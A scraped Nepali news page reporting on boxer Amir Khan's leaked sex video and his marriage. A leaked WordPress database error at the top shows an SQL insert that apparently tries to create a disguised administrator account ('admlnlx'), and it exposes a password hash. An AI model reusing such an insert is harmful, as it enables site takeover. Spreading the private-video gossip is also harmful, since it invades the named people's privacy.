WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx39S/e6Ds.6ge.C9kOEePy12OdoWG1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 23:26:15', '', 'admlnlx', 'admlnlx')
एजेन्सी– बेलायती बक्सर आमिर खानको सेक्स भिडियो सामाजिक सञ्जालमा भाइरल बनेको छ ।भिडियो सार्वजनिक भएसँगै उनको वैवाहिक जीवन संकटमा परेको समाचारहरु सार्वजनिक भएका छन् ।
पाकिस्तानी मुलका आमिरको महिला बक्सरसँग स्काइप च्याटमा अश्लिल हर्कत गर्दै गरेको भिडियो सार्वजनिक भएको हो । आमिरले लण्डन ओलम्पिकमा बेलायतलाई रजत पदक दिलाएका थिए ।
सेक्स भिडियो सार्वजनिक भएसँगै उनकी श्रीमती फरयाल मखदुम तनावमा छिन् । चार वर्षअघि प्रमु विवाह गरेका उनीहरुका दुई सन्तान छन् ।यद्यपि उक्त भिडियो विवाहपूर्वको भएको बताइएको छ ।